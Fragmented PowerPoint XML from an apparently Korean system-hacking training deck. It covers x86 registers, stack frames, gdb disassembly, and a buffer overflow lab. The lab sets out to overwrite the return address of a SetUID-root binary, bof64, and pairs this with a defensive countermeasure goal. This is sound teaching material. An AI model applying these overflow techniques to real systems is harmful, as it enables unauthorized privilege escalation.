            <a:chExt cx="3919993" cy="463445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80E4D0E-B0D4-4619-B7C3-E19AF3D0CE1B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8F76FC-A020-45B8-8C27-58D8CFE89112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634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cd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="11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/ 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mkdir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/ ]# cd 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test ]# touch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test_code.c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test ]# vi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test_code.c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16C0D68-184D-4013-BBB5-35AD80683AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244427" y="1921912"/>
            <a:ext cx="5109376" cy="3144707"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="618733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2D3B273-6C48-4667-8109-771C5D2CC3B8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8238E7-2E67-427E-8C5D-087E95A28A50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6187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test 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gcc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–o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test_code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test_code.c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test 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>
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>test_code.c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test ]# ./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test_code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12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123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0x11dc010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test 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gdb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./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test_code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…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(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gdb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) set disassembly-flavor intel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(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gdb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disas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main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6B78BE11-CD1A-4935-943F-FE3C672F9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20" b="32424"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244427" y="5229340"/>
            <a:ext cx="5403978" cy="106721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9B010F1-3A2A-4AC1-9E0A-DD6FC1CD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684" y="3338497"/>
            <a:ext cx="3216212" cy="295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6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/Training/Unit/Sys/0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 0.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실습 구성도</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 218">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1786AD2-BA00-48D3-80AD-6000488C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624" y="2310737"/>
            <a:ext cx="6154752" cy="2236526"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="14351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1630866-C6A1-45FD-AF61-E871A6EFF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569" y="5486400"/>
            <a:ext cx="10630230" cy="905247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5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공격자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kali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linux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모의침해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시스템 해킹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실습하며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이에 대응하여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방어자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 CentOS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 공격자가 더 이상 시스템에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="18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위협을 가하지 못하도록</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0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시스템 설정 및 상황에 맞는 대응을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B69F52-DEDA-4267-85A3-FA1DC300F7F9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600772A-84A9-4EDF-B257-25C7AC9BEDE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47913B-86FF-4A8F-8565-9D60825203E2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B17A88ED-3592-43DE-9C78-1F086A93EC7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8029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7FFCE75E-B13B-4D5F-9953-EF24EBE09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63" y="4398042"/>
            <a:ext cx="3407245" cy="21154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/Theory/T19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어셈블리어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&amp;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메모리 구조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DE2E4275-ED97-4E73-8D3F-3A6E04DCD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687" y="1838265"/>
            <a:ext cx="3914775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FBBBF2EF-017B-4F30-B3BF-CC90D53C5E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826386" y="3788318"/>
            <a:ext cx="156341" cy="596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5CED58A-1EC0-436F-9D11-37DDFA71CE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12550818">
            <a:off x="4676782" y="2616803"/>
            <a:ext cx="196666" cy="2060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56E4B1-61FA-431E-AD92-BC4F511F96B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373785" y="3878537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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> compile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978D9-A765-43CD-9E1E-5975625C5A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="5603705"/>
            <a:ext cx="7354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b[20]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DB40FA0-7C7E-403F-BBB6-EC1D45CC8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948" y="1780907"/>
            <a:ext cx="2078766" cy="191190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B477217-15EE-4902-869D-049CBACCAE54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="4070060"/>
            <a:ext cx="7354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413065-392F-4C07-8928-092718753163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="3277864"/>
            <a:ext cx="7354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870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/Theory/T19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어셈블리어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범용 레지스터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Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8D674E-A205-4EA5-B390-E71BBA9D9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867" b="44132"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755903" y="3497816"/>
            <a:ext cx="4611625" cy="121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5" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBD847FB-5DFD-4C06-A9F5-9E954FDE39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49767" y="2139696"/>
          <a:ext cx="5680546" cy="3749040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="815937">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004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1077728472"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3980689">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="326902">
                <a:tc rowSpan="9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범용 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  <a:latin typeface="Noto Sans"/>
                      </a:endParaRPr>
                    </a:p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레지스터</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Noto Sans"/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EAX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산술 연산 및 논리 연산 수행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706695"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="326902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EBX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메모리 주소 저장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611002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="510751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ECX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반복문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 사용 시 반복 카운터로 사용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반복할 횟수 지정하고 반복 작업 수행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651176"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="766126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EDX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EAX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레지스터와 같이 쓰임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부호 확장 명령 등에 사용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큰 수의 곱셈 또는 나눗셈 연산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133713"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="326902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EDI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복사할 때 목적지 주소 저장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01460"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="326902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ESI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데이터를 조작하거나 복사할 때 데이터의 주소 저장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518544"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="326902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ESP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메모리 스택의 끝 지점 주소 포인터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2555"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="326902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EBP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메모리 스택의 첫 시작 주소 포인터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318716"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="510751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666666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EIP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</a:b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Noto Sans"/>
                      </a:endParaRP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  <a:latin typeface="Noto Sans"/>
                        </a:rPr>
                        <a:t> 다음에 실행해야 할 명령어의 주소 포인터</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="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19258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F923A64-ACB8-4426-B10D-EF30114C7CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="517284" y="2332714"/>
            <a:ext cx="5113220" cy="794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범용 레지스터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레지스터들 중에서 각각 특별한 용도가 정해져 있는 레지스터</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204752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2BB2ACF1-7215-471F-B6E0-081714EE3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64" y="2026232"/>
            <a:ext cx="5297351" cy="36613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/Theory/T19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어셈블리어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범용 레지스터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3814B75-819F-46B6-805F-DCFADAC9A079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="2104792"/>
            <a:ext cx="1914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5A0F43-3065-463B-AA7E-1BE7E4F501B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2026232"/>
            <a:ext cx="5053584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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 저장한다  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=  SFP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55706FD-9937-4194-AFF6-E3D0A0106830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2287672"/>
            <a:ext cx="1615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FB1239-C138-4054-A166-AB6EDBB73630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2209112"/>
            <a:ext cx="5053584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이전 스택의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp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를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp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에 저장한다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26CC0EE-73CC-4F0A-BF8A-8D3CE56E21F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639056" y="2470552"/>
            <a:ext cx="154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D97CC9-140F-4D29-B084-C95A8E1A2B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2391992"/>
            <a:ext cx="5053584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Esp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의 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x60 = 96</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 늘린다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. = 4*20 + 16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517A26B-8831-4F91-B2E8-43B1247E816D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="2818024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02864CE-DD73-473B-B555-ADE96938F605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2739464"/>
            <a:ext cx="5053584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합</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(heap) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>할당 함수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: C = malloc( … )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A70704F-5A0F-492C-AAF0-C839C1873D21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4565904" y="2644288"/>
            <a:ext cx="1615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9AC2E85-44A3-4DEE-BB89-501E28F3DEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="2565728"/>
            <a:ext cx="5053584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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로 변수인자를 넘긴다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en-US" altLang="ko-KR" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(int) = 4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577BA5E-8017-444A-9A91-C0B6C7A4B0B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5730240" y="3350440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8BBD97C-B661-4011-B444-4AC86E842C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3271880"/>
            <a:ext cx="5053584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</a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 함수 실행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BA41DCC-AF07-4580-AB69-C13A8D9C53A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4992624" y="3176704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F293D1-6206-4F1B-AC1F-CD47C6DAD71D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246386" y="3098144"/>
            <a:ext cx="5053584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Edi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, “1” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의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주소값을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 불러온다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47B542-A4CF-4072-9489-3728752EDE75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="4172712"/>
            <a:ext cx="2072640" cy="1389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b[20]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DCCBB6-017A-402A-B708-811B6BF387E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5733971"/>
            <a:ext cx="2072640" cy="1310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RET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D7876E6-393C-4271-A80A-EF5EF6010938}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="4188640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AD89857-6779-428D-99B5-38FAC8527C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6906768" y="3882169"/>
            <a:ext cx="831070" cy="385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rsp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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 96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FDAC04E-0C32-43B0-AE3D-BA9C91FFFF21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7833360" y="5865041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812DE2-FDDD-4FBB-AEF5-28F1A9DEE926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174992" y="5786481"/>
            <a:ext cx="562846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rbp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38BC1DB-0D7E-4E08-92B1-8CEC56FA449D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394192" y="5591548"/>
            <a:ext cx="2072640" cy="1310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SFP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9A9566A-0DCB-4211-8558-813E6E6D105C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7784592" y="5562600"/>
            <a:ext cx="451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844B4D0-BB90-450D-BFD1-71537A50D05F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="5484040"/>
            <a:ext cx="831070" cy="157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rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 16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66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/Theory/T19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어셈블리어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–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범용 레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB34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CD5C6C-58D3-48F4-93FF-AAD76C081B5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17396D8-C5C9-4505-A138-9C88EFABF13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8D2CE-9C66-4E88-A6BD-91A46478772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7BA49A6F-D13C-4656-A3EE-35EEE50A35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1981065-B258-4705-9F49-9AA19C7D8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87904"/>
            <a:ext cx="3918131" cy="36699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5D14B9-5DA6-4AE7-A5BF-CD6E8EFF5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422" y="2779296"/>
            <a:ext cx="6391275" cy="7810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D57461-3057-40F9-9CC6-D61932E99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422" y="2172080"/>
            <a:ext cx="2615847" cy="565023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Picture 4" descr="아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB771A46-7BCD-40E5-A3BF-DE7EC893F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1" r="33210" b="63562"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5289422" y="4634961"/>
            <a:ext cx="2194561" cy="179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아스키 코드표">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C12FD55D-CE08-44EF-9306-0B7493689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t="48557" r="66513" b="18054"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7687057" y="4710113"/>
            <a:ext cx="2206751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F0021EB-70AC-4C11-81DE-8C81281EF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9422" y="3579347"/>
            <a:ext cx="55721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82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Buffer Overflow Attack? ⚔️ Types, Examples">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28936090-CDA9-4037-82F4-93F6F95D8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816" y="1347537"/>
            <a:ext cx="8522368" cy="511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3BD1FF58-991E-4299-8B55-4F47E8B42413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584664" y="153055"/>
            <a:ext cx="8903825" cy="9087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 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600">
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>. buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty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900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/Training/Unit/Sys/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="44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Buffer Overflow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공격 및 방어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/bof64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존재하는 스택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이용하여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bar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실행되도록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test / test123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디스어셈블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objdump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 intel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파일 이름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이용하여 복귀 주소를 조작할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버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1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이용한 복귀 주소 조작에 대응할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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D4016FD-501C-4282-900C-883412B2BAA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F724D9F0-FF13-4AF3-8FF3-E28D36330FB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8CD331-CD08-4A67-9051-38693C5B197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6D6D78E-F1DC-4B1A-9DB9-A4115BF300EB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9977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en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리로 이동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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일의 속성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ls –l bof64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/>
              <a:t>※ SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 설정되어 있고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소유자가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>임을 알 수 있음 ⇒ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>권한으로 실행 가능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/>
              <a:t>/sec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/bof64.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 파일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vim bof64.c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※ foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수에서 버퍼 </a:t>
